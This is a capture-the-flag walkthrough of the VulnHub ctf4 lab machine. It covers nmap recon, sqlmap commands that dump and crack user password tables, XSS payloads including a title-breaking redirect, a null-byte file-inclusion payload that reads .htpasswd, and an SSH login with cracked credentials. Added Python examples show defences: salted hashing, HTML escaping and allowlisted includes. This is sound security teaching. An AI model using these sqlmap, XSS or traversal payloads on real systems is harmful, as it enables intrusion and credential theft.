Penetration Testing Series: VulnHub ctf4


1.
Yujian, dirb: directory scanning
2.
robots.txt

User-agent: *
Disallow: /mail/
Disallow: /restricted/
Disallow: /conf/
Disallow: /sql/
Disallow: /admin/

3.
http://192.168.244.141/calendar/index.php?action=admin
http://192.168.244.141/conf/ (same as http://192.168.244.141/mail/src/login.php)
http://192.168.244.141/admin/
Three login pages
4.
nmap -A -p0-65535 192.168.244.141
httprint is also a web fingerprinting tool; I haven't used it.
nmap is enough.

Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-09 21:51 CST
Nmap scan report for 192.168.244.141
Host is up (0.00033s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 10:4a:18:f8:97:e0:72:27:b5:a4:33:93:3d:aa:9d:ef (DSA)
|_  2048 e7:70:d3:81:00:41:b8:6e:fd:31:ae:0e:00:ea:5c:b4 (RSA)
25/tcp  open   smtp    Sendmail 8.13.5/8.13.5
| smtp-commands: ctf4.sas.upenn.edu Hello [192.168.244.129], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.5 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP ". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp  open   http    Apache httpd 2.2.0 ((Fedora))
| http-robots.txt: 5 disallowed entries
|_/mail/ /restricted/ /conf/ /sql/ /admin/
|_http-server-header: Apache/2.2.0 (Fedora)
|_http-title:  Prof. Ehks
631/tcp closed ipp
MAC Address: 00:0C:29:28:D9:61 (VMware)
Device type: general purpose|proxy server|remote management|terminal server|switch|WAP
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (98%), SonicWALL embedded (95%), Control4 embedded (95%), Lantronix embedded (95%), SNR embedded (95%), Dell iDRAC 6 (94%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:sonicwall:aventail_ex-6000 cpe:/h:lantronix:slc_8 cpe:/h:snr:snr-s2960 cpe:/o:dell:idrac6_firmware cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.1
Aggressive OS guesses: Linux 2.6.16 - 2.6.21 (98%), Linux 2.6.13 - 2.6.32 (96%), SonicWALL Aventail EX-6000 VPN appliance (95%), Control4 HC-300 home controller (95%), Lantronix SLC 8 terminal server (Linux 2.6) (95%), SNR SNR-S2960 switch (95%), Linux 2.6.8 - 2.6.30 (94%), Linux 2.6.9 - 2.6.18 (94%), Dell iDRAC 6 remote access controller (Linux 2.6) (94%), Linux 2.6.18 - 2.6.32 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix
TRACEROUTE
HOP RTT     ADDRESS
1   0.33 ms 192.168.244.141
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.17 seconds

5. Scanner tools
Nessus (not available on Kali)
Nikto
6. SQL injection
sqlmap -r "post.txt" -p username,password --batch --dbms=mysql --dbs
sqlmap -u "" --forms
[*] calendar
[*] ehks
[*] information_schema
[*] mysql
[*] roundcubemail
[*] test
sqlmap -r "post.txt" -p username,password --batch --dbms=mysql -D calendar -T phpc_users -C "username,password" --dump
| username  | password                                         |
+-----------+--------------------------------------------------+
| anonymous | <blank>                                          |
| dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |
| jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |
| pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
| admin     | a0e7b2a565119c0a7ec3126a16016113 (calendar)      |
| achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
sqlmap -r "post.txt" -p username,password --batch --dbms=mysql -D ehks -T user -C "user_name,user_pass" --dump
| user_name | user_pass                                        |
+-----------+--------------------------------------------------+
| achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |
| ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |
| jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |
| pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
| sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |
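Both dumps store passwords as unsalted MD5, which is why sqlmap can attach the plaintext to every row and why dstevens, jdurbin and pmoore carry the identical hash in both tables. The block below is an added example, not part of this walkthrough or the ctf4 applications: it contrasts that storage scheme with salted, iterated PBKDF2-HMAC-SHA256 and includes a small audit that a defender can run over an existing table. The user names and passwords are constructed samples modelled on the dump, and the iteration count is an assumption, not a recommendation taken from the page.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional, Set

# Constructed sample credentials shaped like the ctf4 dump (not the real rows).
SAMPLE_USERS: Dict[str, str] = {
    "dstevens": "ilike2surf",
    "sorzek": "pacman",
    "jdurbin": "ilike2surf",   # constructed: a second account reusing the same password
}

# Assumption: a PBKDF2 work factor chosen for this demo; tune it for your platform.
ITERATIONS = 100_000


def store_md5(password: str) -> str:
    """What the ctf4 apps do: unsalted MD5.

    The digest is a pure function of the password, so equal passwords give equal
    hashes and a precomputed table maps each hash straight back to the word.
    """
    return hashlib.md5(password.encode()).hexdigest()


def store_pbkdf2(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, iterated hash in the form 'pbkdf2_sha256$<iters>$<salt hex>$<digest hex>'."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_pbkdf2(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


def duplicate_hashes(table: Dict[str, str]) -> Set[str]:
    """Defender's audit over a user -> stored-hash table.

    In an unsalted table any hash that appears more than once proves password
    reuse across accounts without cracking anything; a salted table never has
    duplicates, so the audit also tells you which scheme is in use.
    """
    seen: Set[str] = set()
    dupes: Set[str] = set()
    for stored in table.values():
        if stored in seen:
            dupes.add(stored)
        seen.add(stored)
    return dupes


if __name__ == "__main__":
    md5_table = {u: store_md5(p) for u, p in SAMPLE_USERS.items()}
    pbkdf2_table = {u: store_pbkdf2(p) for u, p in SAMPLE_USERS.items()}
    print("MD5 duplicates:   ", duplicate_hashes(md5_table))
    print("PBKDF2 duplicates:", duplicate_hashes(pbkdf2_table))
    print("sorzek verifies:  ", verify_pbkdf2("pacman", pbkdf2_table["sorzek"]))
```

Running the audit against the MD5 table flags the shared hash immediately; against the PBKDF2 table it finds nothing, and only the verify function (with the per-user salt) can tell whether a guess is right.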
7. XSS
<script>alert("xss")</script>
Works.
http://192.168.244.141/?title=</title><script>location.href='https://www.baidu.com/';</script> redirect succeeds
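The title payload works because the parameter is written straight into the `<title>` element, so a `</title>` in the input closes the element and whatever follows is parsed as markup. As an added example (not code from the walkthrough or from the ctf4 site), the block below renders a page the vulnerable way and the escaped way, and counts `<script` tags in the result so the difference is checkable. The template and probe string are constructed for the demo.

```python
import html
import re

# Constructed template standing in for the ctf4 index page.
PAGE_TEMPLATE = (
    "<html><head><title>{title}</title></head>"
    "<body><h1>Prof. Ehks</h1></body></html>"
)

# Constructed probe shaped like the payload above; the host is a reserved test name.
PROBE = "</title><script>location.href='https://example.invalid/';</script>"

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def render_vulnerable(title: str) -> str:
    """Untrusted title interpolated into the markup unchanged."""
    return PAGE_TEMPLATE.format(title=title)


def render_safe(title: str) -> str:
    """Escape for the HTML text context first: '<' becomes '&lt;', '"' becomes
    '&quot;', so the input can no longer close <title> or open a new element."""
    return PAGE_TEMPLATE.format(title=html.escape(title, quote=True))


def script_tag_count(document: str) -> int:
    """Number of <script ...> openings in a rendered document."""
    return len(SCRIPT_TAG.findall(document))


if __name__ == "__main__":
    print("vulnerable:", script_tag_count(render_vulnerable(PROBE)))  # 1
    print("escaped:   ", script_tag_count(render_safe(PROBE)))        # 0
```

The escape has to match the output context: `html.escape` is right for element text and attribute values, but a title that ends up inside a `<script>` block or a URL needs a different encoder.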
8.
File inclusion
page=../inc/header
Forbidden
restricted/.htpasswd
http://192.168.244.141/?page=../restricted/.htpasswd%00  (still to be understood)
nothing
<?php $page = $_GET['page']; include($page . ".php"); ?>
Obtained:
ghighland:8RkVRDjjkJhq6 pmoore:xHaymgB2KxbJU jdurbin:DPdoXSwmSWpYo sorzek:z/a8PtVaqxwWg
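The `%00` works on this box because PHP before 5.3.4 passed the include path to C string functions: the NUL byte ends the string, so the `.php` that `include($page . ".php")` appends is never seen and the traversal reaches `.htpasswd` as-is. The block below is an added example, not code from the walkthrough or the ctf4 site: it emulates that old resolution in Python (which itself refuses embedded NUL bytes) and sets a hardened resolver beside it that allowlists page names and confirms the real path stays under the pages directory. The document root, pages directory and allowlist are constructed assumptions.

```python
import os
import re
from typing import Optional

# Assumptions for the demo: where the app lives and which pages may be included.
WEB_ROOT = "/var/www/html"
PAGES_DIR = os.path.realpath(os.path.join(WEB_ROOT, "pages"))
ALLOWED_PAGES = {"index", "about", "contact"}

# Page names are short identifiers; anything else is rejected before touching the filesystem.
PAGE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def resolve_vulnerable(page: str) -> str:
    """Emulates include($page . '.php') on PHP < 5.3.4.

    The path went to a C string function, so everything after the first NUL byte
    (including the appended '.php') was dropped. Emulated with split(); modern PHP
    and Python raise an error on embedded NUL bytes instead of truncating.
    """
    raw = page + ".php"
    truncated = raw.split("\x00", 1)[0]
    return os.path.normpath(os.path.join(PAGES_DIR, truncated))


def resolve_safe(page: str) -> Optional[str]:
    """Allowlist the name, then prove the resolved path is inside PAGES_DIR.

    The allowlist alone is sufficient; the realpath containment check is
    defence in depth against a later edit that loosens the allowlist.
    """
    if not PAGE_NAME.fullmatch(page) or page not in ALLOWED_PAGES:
        return None
    candidate = os.path.realpath(os.path.join(PAGES_DIR, page + ".php"))
    if os.path.commonpath([candidate, PAGES_DIR]) != PAGES_DIR:
        return None
    return candidate


if __name__ == "__main__":
    probe = "../restricted/.htpasswd\x00"   # constructed, shaped like the URL above
    print("old PHP would open:", resolve_vulnerable(probe))
    print("hardened resolver: ", resolve_safe(probe))        # None
    print("hardened resolver: ", resolve_safe("about"))
```

Reading the emulated result is the quickest way to explain the finding in a report: the resolver hands back a path outside the pages directory with no `.php` suffix, which is exactly the file the walkthrough retrieved.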
9. Cracking the htpasswd passwords
john, hydra, medusa
Cracking htpasswd in bulk with John and L0phtCrack
https://blog.csdn.net/liushu_it/article/details/18735857
john
http://www.openwall.com/john/doc/FAQ.shtml
No password hashes loaded (see FAQ)
john htpasswd --show
sorzek:pacman
10. SSH in
[sorzek@ctf4 ~]$ ls
mail
[sorzek@ctf4 ~]$ pwd
/home/sorzek
[sorzek@ctf4 ~]$ whoami
sorzek
[sorzek@ctf4 ~]$ ls -la
total 64
drwxr-xr-x 3 sorzek users 4096 Mar 10 2009 .
drwxr-xr-x 8 root users 4096 Mar 6 2009 ..
-rw------- 1 sorzek sorzek 16 Mar 9 2009 .bash_history
-rw-r--r-- 1 sorzek sorzek 24 Mar 6 2009 .bash_logout
-rw-r--r-- 1 sorzek sorzek 191 Mar 6 2009 .bash_profile
-rw-r--r-- 1 sorzek sorzek 124 Mar 6 2009 .bashrc
-rw-r--r-- 1 sorzek sorzek 120 Mar 6 2009 .gtkrc
drwx------ 3 sorzek sorzek 4096 Mar 10 2009 mail
[sorzek@ctf4 ~]$
[sorzek@ctf4 ~]$ cat /etc/*-release
Fedora Core release 5 (Bordeaux)
Fedora Core release 5 (Bordeaux)
[sorzek@ctf4 ~]$ uname -a
Linux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
 
2018.7.9
